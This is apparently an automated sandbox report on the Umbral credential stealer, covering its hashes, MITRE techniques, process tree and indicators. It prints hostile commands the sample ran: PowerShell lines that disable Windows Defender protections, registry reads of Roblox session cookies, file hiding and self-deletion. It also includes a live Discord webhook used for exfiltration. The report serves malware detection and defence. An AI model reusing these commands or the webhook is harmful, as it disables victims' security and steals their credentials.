umbral | 1eac7f1debb3f6c96260977b111028ae3dcf2d7907e1a2c916044c3942e9e05d

Analysis

max time kernel
116s
max time network
157s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
16-08-2024 19:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LOADER.exe
Size

15.5MB
MD5

5f62b2a17cda80f8ef9bf521fde17e42
SHA1

5086572ec9aa37b50590a36300b374160d8ffacb
SHA256

1eac7f1debb3f6c96260977b111028ae3dcf2d7907e1a2c916044c3942e9e05d
SHA512

24e72654fd5fbe2a646d0e9b9ca239852d630de426002f3b7ac56c5a16c12037c1559a6e8420e535fd4fd7865b4f8ec2c5330f83b0781287251a4076d3a0a139
SSDEEP

393216:HV0WnD+wO04M1o4FJO22+j79cC/QWXtsVy5J58mu+F2f3nDNzxg:1dniwO04L4+l+j79H/QW3zFIPpa

Score

10^/10

umbral credential_access discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1270702077819097171/aH_welMr5BV0d8bcgAcZ1YefXQZm7768r2-61SpHYIVQE_jXaf2nibmp1wX6DuE5bOcQ

Signatures

Detect Umbral payload 5 IoCs

resource	yara_rule
behavioral1/memory/2880-15-0x00000000011D0000-0x0000000001210000-memory.dmp	family_umbral
behavioral1/files/0x0026000000018f8c-13.dat	family_umbral
behavioral1/memory/752-544-0x00000000002A0000-0x00000000002E0000-memory.dmp	family_umbral
behavioral1/memory/2152-599-0x0000000001280000-0x00000000012C0000-memory.dmp	family_umbral
behavioral1/memory/1604-649-0x00000000012A0000-0x00000000012E0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 44 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2196	powershell.exe
1708	powershell.exe
480	powershell.exe
2552	powershell.exe
2516	powershell.exe
2832	powershell.exe
2180	powershell.exe
1000	powershell.exe
2576	powershell.exe
868	powershell.exe
1664	powershell.exe
1700	powershell.exe
2460	powershell.exe
916	powershell.exe
2480	powershell.exe
2360	powershell.exe
2896	powershell.exe
2816	powershell.exe
2440	powershell.exe
2644	powershell.exe
1112	powershell.exe
2512	powershell.exe
2180	powershell.exe
736	powershell.exe
2832	powershell.exe
1576	powershell.exe
1976	powershell.exe
3056	powershell.exe
1592	powershell.exe
2692	powershell.exe
852	powershell.exe
2388	powershell.exe
2248	powershell.exe
2676	powershell.exe
480	powershell.exe
1324	powershell.exe
2180	powershell.exe
1544	powershell.exe
1940	powershell.exe
2796	powershell.exe
1108	powershell.exe
2768	powershell.exe
2808	powershell.exe
732	powershell.exe

Drops file in Drivers directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Executes dropped EXE 64 IoCs

pid	Process
2760	loaderexp.exe
2880	Umbral.exe
2752	loaderexp.exe
2820	Umbral.exe
2944	loaderexp.exe
2996	Umbral.exe
2300	loaderexp.exe
2224	Umbral.exe
1784	loaderexp.exe
936	Umbral.exe
2452	loaderexp.exe
2652	Umbral.exe
2920	loaderexp.exe
3000	Umbral.exe
1608	loaderexp.exe
564	Umbral.exe
1948	loaderexp.exe
2672	Umbral.exe
2640	loaderexp.exe
3020	Umbral.exe
3008	loaderexp.exe
2344	Umbral.exe
2732	Umbral.exe
2924	loaderexp.exe
2164	loaderexp.exe
928	Umbral.exe
1708	loaderexp.exe
1156	Umbral.exe
480	loaderexp.exe
1264	Umbral.exe
3068	loaderexp.exe
2392	Umbral.exe
536	loaderexp.exe
876	Umbral.exe
932	loaderexp.exe
320	Umbral.exe
2876	loaderexp.exe
880	Umbral.exe
2080	loaderexp.exe
2380	Umbral.exe
2300	loaderexp.exe
2328	Umbral.exe
2236	Umbral.exe
1520	loaderexp.exe
1004	loaderexp.exe
2844	Umbral.exe
2296	loaderexp.exe
2016	Umbral.exe
3008	loaderexp.exe
2248	Umbral.exe
3032	loaderexp.exe
2976	Umbral.exe
2140	loaderexp.exe
2852	Umbral.exe
1180	loaderexp.exe
2632	Umbral.exe
572	loaderexp.exe
108	Umbral.exe
1928	loaderexp.exe
2464	Umbral.exe
2588	Umbral.exe
868	loaderexp.exe
2796	loaderexp.exe
3024	Umbral.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 22 IoCs

Web Service

T1102

flow	ioc
89	discord.com
25	discord.com
26	discord.com
42	discord.com
57	discord.com
66	discord.com
81	discord.com
82	discord.com
34	discord.com
74	discord.com
18	discord.com
41	discord.com
65	discord.com
73	discord.com
90	discord.com
9	discord.com
10	discord.com
17	discord.com
33	discord.com
49	discord.com
50	discord.com
58	discord.com

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com
22	ip-api.com
30	ip-api.com
62	ip-api.com
70	ip-api.com
78	ip-api.com
86	ip-api.com
6	ip-api.com
46	ip-api.com
54	ip-api.com
38	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 22 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2132	PING.EXE
1152	PING.EXE
732	PING.EXE
1996	cmd.exe
1748	PING.EXE
920	PING.EXE
1744	cmd.exe
1152	cmd.exe
2976	PING.EXE
928	PING.EXE
1532	cmd.exe
1784	cmd.exe
3028	cmd.exe
2280	cmd.exe
2132	cmd.exe
2472	cmd.exe
2536	PING.EXE
1480	cmd.exe
3036	PING.EXE
2516	PING.EXE
1824	PING.EXE
1708	cmd.exe

Detects videocard installed 1 TTPs 11 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2796	wmic.exe
2052	wmic.exe
3056	wmic.exe
1828	wmic.exe
1140	wmic.exe
1732	wmic.exe
2088	wmic.exe
2912	wmic.exe
1156	wmic.exe
1676	wmic.exe
2268	wmic.exe

Runs ping.exe 1 TTPs 11 IoCs

Remote System Discovery

T1018

pid	Process
920	PING.EXE
2976	PING.EXE
732	PING.EXE
3036	PING.EXE
1748	PING.EXE
1824	PING.EXE
2132	PING.EXE
1152	PING.EXE
928	PING.EXE
2536	PING.EXE
2516	PING.EXE

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
2880	Umbral.exe
1000	powershell.exe
1700	powershell.exe
852	powershell.exe
580	powershell.exe
480	powershell.exe
3000	Umbral.exe
2196	powershell.exe
2388	powershell.exe
2460	powershell.exe
1716	powershell.exe
2644	powershell.exe
2732	Umbral.exe
2576	powershell.exe
1112	powershell.exe
2512	powershell.exe
108	powershell.exe
2796	powershell.exe
876	Umbral.exe
1708	powershell.exe
2180	powershell.exe
1108	powershell.exe
2344	powershell.exe
736	powershell.exe
2236	Umbral.exe
868	powershell.exe
2896	powershell.exe
2816	powershell.exe
3068	powershell.exe
916	powershell.exe
2976	Umbral.exe
1664	powershell.exe
1324	powershell.exe
2768	powershell.exe
1700	powershell.exe
1592	powershell.exe
2464	Umbral.exe
480	powershell.exe
2808	powershell.exe
2480	powershell.exe
2460	powershell.exe
2440	powershell.exe
1528	Umbral.exe
2516	powershell.exe
2832	powershell.exe
1576	powershell.exe
1672	powershell.exe
2180	powershell.exe
1084	Umbral.exe
2832	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2880	Umbral.exe
Token: SeIncreaseQuotaPrivilege	1668	wmic.exe
Token: SeSecurityPrivilege	1668	wmic.exe
Token: SeTakeOwnershipPrivilege	1668	wmic.exe
Token: SeLoadDriverPrivilege	1668	wmic.exe
Token: SeSystemProfilePrivilege	1668	wmic.exe
Token: SeSystemtimePrivilege	1668	wmic.exe
Token: SeProfSingleProcessPrivilege	1668	wmic.exe
Token: SeIncBasePriorityPrivilege	1668	wmic.exe
Token: SeCreatePagefilePrivilege	1668	wmic.exe
Token: SeBackupPrivilege	1668	wmic.exe
Token: SeRestorePrivilege	1668	wmic.exe
Token: SeShutdownPrivilege	1668	wmic.exe
Token: SeDebugPrivilege	1668	wmic.exe
Token: SeSystemEnvironmentPrivilege	1668	wmic.exe
Token: SeRemoteShutdownPrivilege	1668	wmic.exe
Token: SeUndockPrivilege	1668	wmic.exe
Token: SeManageVolumePrivilege	1668	wmic.exe
Token: 33	1668	wmic.exe
Token: 34	1668	wmic.exe
Token: 35	1668	wmic.exe
Token: SeIncreaseQuotaPrivilege	1668	wmic.exe
Token: SeSecurityPrivilege	1668	wmic.exe
Token: SeTakeOwnershipPrivilege	1668	wmic.exe
Token: SeLoadDriverPrivilege	1668	wmic.exe
Token: SeSystemProfilePrivilege	1668	wmic.exe
Token: SeSystemtimePrivilege	1668	wmic.exe
Token: SeProfSingleProcessPrivilege	1668	wmic.exe
Token: SeIncBasePriorityPrivilege	1668	wmic.exe
Token: SeCreatePagefilePrivilege	1668	wmic.exe
Token: SeBackupPrivilege	1668	wmic.exe
Token: SeRestorePrivilege	1668	wmic.exe
Token: SeShutdownPrivilege	1668	wmic.exe
Token: SeDebugPrivilege	1668	wmic.exe
Token: SeSystemEnvironmentPrivilege	1668	wmic.exe
Token: SeRemoteShutdownPrivilege	1668	wmic.exe
Token: SeUndockPrivilege	1668	wmic.exe
Token: SeManageVolumePrivilege	1668	wmic.exe
Token: 33	1668	wmic.exe
Token: 34	1668	wmic.exe
Token: 35	1668	wmic.exe
Token: SeDebugPrivilege	1000	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	580	powershell.exe
Token: SeIncreaseQuotaPrivilege	1684	wmic.exe
Token: SeSecurityPrivilege	1684	wmic.exe
Token: SeTakeOwnershipPrivilege	1684	wmic.exe
Token: SeLoadDriverPrivilege	1684	wmic.exe
Token: SeSystemProfilePrivilege	1684	wmic.exe
Token: SeSystemtimePrivilege	1684	wmic.exe
Token: SeProfSingleProcessPrivilege	1684	wmic.exe
Token: SeIncBasePriorityPrivilege	1684	wmic.exe
Token: SeCreatePagefilePrivilege	1684	wmic.exe
Token: SeBackupPrivilege	1684	wmic.exe
Token: SeRestorePrivilege	1684	wmic.exe
Token: SeShutdownPrivilege	1684	wmic.exe
Token: SeDebugPrivilege	1684	wmic.exe
Token: SeSystemEnvironmentPrivilege	1684	wmic.exe
Token: SeRemoteShutdownPrivilege	1684	wmic.exe
Token: SeUndockPrivilege	1684	wmic.exe
Token: SeManageVolumePrivilege	1684	wmic.exe
Token: 33	1684	wmic.exe
Token: 34	1684	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2304 wrote to memory of 2504	2304	LOADER.exe	29
PID 2304 wrote to memory of 2504	2304	LOADER.exe	29
PID 2304 wrote to memory of 2504	2304	LOADER.exe	29
PID 2304 wrote to memory of 2760	2304	LOADER.exe	30
PID 2304 wrote to memory of 2760	2304	LOADER.exe	30
PID 2304 wrote to memory of 2760	2304	LOADER.exe	30
PID 2304 wrote to memory of 2880	2304	LOADER.exe	31
PID 2304 wrote to memory of 2880	2304	LOADER.exe	31
PID 2304 wrote to memory of 2880	2304	LOADER.exe	31
PID 2504 wrote to memory of 2676	2504	loader.exe	33
PID 2504 wrote to memory of 2676	2504	loader.exe	33
PID 2504 wrote to memory of 2676	2504	loader.exe	33
PID 2504 wrote to memory of 2752	2504	loader.exe	34
PID 2504 wrote to memory of 2752	2504	loader.exe	34
PID 2504 wrote to memory of 2752	2504	loader.exe	34
PID 2504 wrote to memory of 2820	2504	loader.exe	35
PID 2504 wrote to memory of 2820	2504	loader.exe	35
PID 2504 wrote to memory of 2820	2504	loader.exe	35
PID 2880 wrote to memory of 1668	2880	Umbral.exe	36
PID 2880 wrote to memory of 1668	2880	Umbral.exe	36
PID 2880 wrote to memory of 1668	2880	Umbral.exe	36
PID 2676 wrote to memory of 2976	2676	loader.exe	38
PID 2676 wrote to memory of 2976	2676	loader.exe	38
PID 2676 wrote to memory of 2976	2676	loader.exe	38
PID 2880 wrote to memory of 2992	2880	Umbral.exe	39
PID 2880 wrote to memory of 2992	2880	Umbral.exe	39
PID 2880 wrote to memory of 2992	2880	Umbral.exe	39
PID 2676 wrote to memory of 2944	2676	loader.exe	41
PID 2676 wrote to memory of 2944	2676	loader.exe	41
PID 2676 wrote to memory of 2944	2676	loader.exe	41
PID 2676 wrote to memory of 2996	2676	loader.exe	42
PID 2676 wrote to memory of 2996	2676	loader.exe	42
PID 2676 wrote to memory of 2996	2676	loader.exe	42
PID 2880 wrote to memory of 1000	2880	Umbral.exe	43
PID 2880 wrote to memory of 1000	2880	Umbral.exe	43
PID 2880 wrote to memory of 1000	2880	Umbral.exe	43
PID 2880 wrote to memory of 1700	2880	Umbral.exe	45
PID 2880 wrote to memory of 1700	2880	Umbral.exe	45
PID 2880 wrote to memory of 1700	2880	Umbral.exe	45
PID 2976 wrote to memory of 2236	2976	loader.exe	47
PID 2976 wrote to memory of 2236	2976	loader.exe	47
PID 2976 wrote to memory of 2236	2976	loader.exe	47
PID 2976 wrote to memory of 2300	2976	loader.exe	48
PID 2976 wrote to memory of 2300	2976	loader.exe	48
PID 2976 wrote to memory of 2300	2976	loader.exe	48
PID 2976 wrote to memory of 2224	2976	loader.exe	49
PID 2976 wrote to memory of 2224	2976	loader.exe	49
PID 2976 wrote to memory of 2224	2976	loader.exe	49
PID 2880 wrote to memory of 852	2880	Umbral.exe	50
PID 2880 wrote to memory of 852	2880	Umbral.exe	50
PID 2880 wrote to memory of 852	2880	Umbral.exe	50
PID 2880 wrote to memory of 580	2880	Umbral.exe	52
PID 2880 wrote to memory of 580	2880	Umbral.exe	52
PID 2880 wrote to memory of 580	2880	Umbral.exe	52
PID 2236 wrote to memory of 1936	2236	loader.exe	54
PID 2236 wrote to memory of 1936	2236	loader.exe	54
PID 2236 wrote to memory of 1936	2236	loader.exe	54
PID 2236 wrote to memory of 1784	2236	loader.exe	55
PID 2236 wrote to memory of 1784	2236	loader.exe	55
PID 2236 wrote to memory of 1784	2236	loader.exe	55
PID 2236 wrote to memory of 936	2236	loader.exe	56
PID 2236 wrote to memory of 936	2236	loader.exe	56
PID 2236 wrote to memory of 936	2236	loader.exe	56
PID 2880 wrote to memory of 1684	2880	Umbral.exe	57

Views/modifies file attributes 1 TTPs 11 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2992	attrib.exe
1580	attrib.exe
2444	attrib.exe
2644	attrib.exe
1608	attrib.exe
2068	attrib.exe
2220	attrib.exe
1172	attrib.exe
908	attrib.exe
612	attrib.exe
2160	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LOADER.exe
"C:\Users\Admin\AppData\Local\Temp\LOADER.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2304
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2676
  - - C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2976
    - - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2236
      - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        6⤵
        
        PID:1936
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        7⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        8⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        9⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        10⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        11⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        12⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        13⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        14⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        15⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        16⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        17⤵
        
        PID:2460
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        18⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        19⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        20⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        21⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        22⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        23⤵
        
        PID:2712
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        24⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        25⤵
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        26⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        27⤵
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        28⤵
        
        PID:2712
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        29⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        30⤵
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        31⤵
        
        PID:1120
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        32⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        33⤵
        
        PID:2940
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        34⤵
        
        PID:108
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        35⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        36⤵
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        37⤵
        
        PID:292
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        38⤵
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        39⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        40⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        41⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        42⤵
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        43⤵
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        44⤵
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        45⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        46⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        47⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        48⤵
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        49⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        50⤵
        
        PID:932
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        51⤵
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        52⤵
        
        PID:1052
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        53⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        53⤵
        
        PID:292
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        53⤵
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        52⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        52⤵
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        51⤵
        
        PID:1136
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        51⤵
        
        PID:864
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        50⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        50⤵
        
        PID:1832
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        49⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        49⤵
        
        PID:2152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:2140
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        50⤵
        Views/modifies file attributes
        
        PID:2160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        
        PID:2292
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        50⤵
        
        PID:2736
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        50⤵
        
        PID:2512
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        50⤵
        Detects videocard installed
        
        PID:1140
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        50⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1708
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        51⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        48⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        48⤵
        
        PID:912
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        47⤵
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        47⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        46⤵
        
        PID:1352
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        46⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        45⤵
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        45⤵
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        44⤵
        
        PID:936
        
